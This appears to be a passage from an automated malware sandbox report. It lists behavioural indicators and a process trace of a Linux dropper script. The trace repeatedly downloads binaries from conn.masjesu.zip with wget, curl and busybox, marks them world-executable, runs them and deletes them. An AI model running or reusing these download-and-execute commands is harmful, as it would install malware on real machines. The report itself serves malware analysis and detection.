| N/A | /tmp/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5 | /tmp/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5 | N/A |
| N/A | /tmp/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B | /tmp/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B | N/A |
| N/A | /tmp/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg | /tmp/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg | N/A |
| N/A | /tmp/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw | /tmp/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw | N/A |
| N/A | /tmp/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH | /tmp/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH | N/A |
| N/A | /tmp/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h | /tmp/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h | N/A |
| N/A | /tmp/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM | /tmp/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h | /usr/bin/curl | N/A |
| File opened for modification | /tmp/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy | /usr/bin/curl | N/A |
| File opened for modification | /tmp/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH | /usr/bin/curl | N/A |
| File opened for modification | /tmp/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg | /usr/bin/curl | N/A |
| File opened for modification | /tmp/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg | /usr/bin/curl | N/A |
Processes
/tmp/19a71eb81c8fd44171b07fe5b4f687a33a8188058d345e567bea9cae37fcf912.sh
[/tmp/19a71eb81c8fd44171b07fe5b4f687a33a8188058d345e567bea9cae37fcf912.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH]
/bin/chmod
[chmod 777 3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH]
/tmp/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH
[./3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH]
/bin/rm
[rm 3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h]
/bin/chmod
[chmod 777 q8by6B3GMmnW2fqzokCod3DStJogu7sm1h]
/tmp/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h
[./q8by6B3GMmnW2fqzokCod3DStJogu7sm1h]
/bin/rm
[rm q8by6B3GMmnW2fqzokCod3DStJogu7sm1h]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM]
/bin/chmod
[chmod 777 eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM]
/tmp/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM
[./eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM]
/bin/rm
[rm eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd]
/bin/chmod
[chmod 777 Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd]
/tmp/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd
[./Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd]
/bin/rm
[rm Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM]
/bin/chmod
[chmod 777 SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM]
/tmp/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM
[./SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM]
/bin/rm
[rm SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI]
/bin/chmod
[chmod 777 EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI]
/tmp/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI
[./EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI]
/bin/rm
[rm EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG]
/bin/chmod
[chmod 777 v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG]
/tmp/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG
[./v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG]
/bin/rm
[rm v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B]
/bin/chmod
[chmod 777 GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B]
/tmp/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B
[./GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B]
/bin/rm
[rm GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg]
/bin/chmod
[chmod 777 GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg]
/tmp/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg
[./GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg]
/bin/rm
[rm GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj]
/bin/chmod
[chmod 777 KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj]
/tmp/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj
[./KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj]
/bin/rm
[rm KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy]
/bin/chmod
[chmod 777 IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy]
/tmp/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy
[./IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy]
/bin/rm
[rm IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc]
/bin/chmod
[chmod 777 IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc]
/tmp/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc
[./IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc]
/bin/rm
[rm IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5]
/bin/chmod
[chmod 777 XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5]
/tmp/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5
[./XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5]
/bin/rm
[rm XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw]
/bin/chmod
[chmod 777 Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw]
/tmp/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw
[./Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw]
/bin/rm
[rm Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd]
/bin/chmod
[chmod 777 Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd]
/tmp/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd
[./Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd]
/bin/rm
[rm Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM]
/bin/chmod
[chmod 777 SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM]
/tmp/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM
[./SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM]
/bin/rm
[rm SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI]
/bin/chmod
[chmod 777 EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI]
/tmp/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI
[./EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI]
/bin/rm
[rm EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG]
/bin/chmod
[chmod 777 v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG]
/tmp/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG
[./v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG]
/bin/rm
[rm v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj]
/bin/chmod
[chmod 777 KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj]
/tmp/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj
[./KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj]
/bin/rm
[rm KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy]
/bin/chmod
[chmod 777 IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy]
/tmp/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy
[./IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy]
/bin/rm
[rm IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc]
/bin/chmod
[chmod 777 IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc]
/tmp/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc
[./IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc]
/bin/rm
[rm IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5]
/bin/chmod
[chmod 777 XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5]
/tmp/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5
[./XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5]
/bin/rm
[rm XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B]
/bin/chmod
[chmod 777 GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B]
/tmp/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B
[./GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B]
/bin/rm
[rm GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg]
/bin/chmod
[chmod 777 GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg]
/tmp/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg
[./GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg]
/bin/rm
[rm GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw]
/bin/chmod
[chmod 777 Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw]
/tmp/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw
[./Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw]
/bin/rm
[rm Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH]
/bin/chmod
[chmod 777 3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH]
/tmp/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH
[./3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH]
/bin/rm
[rm 3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h]
/bin/chmod
[chmod 777 q8by6B3GMmnW2fqzokCod3DStJogu7sm1h]
/tmp/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h
[./q8by6B3GMmnW2fqzokCod3DStJogu7sm1h]
/bin/rm
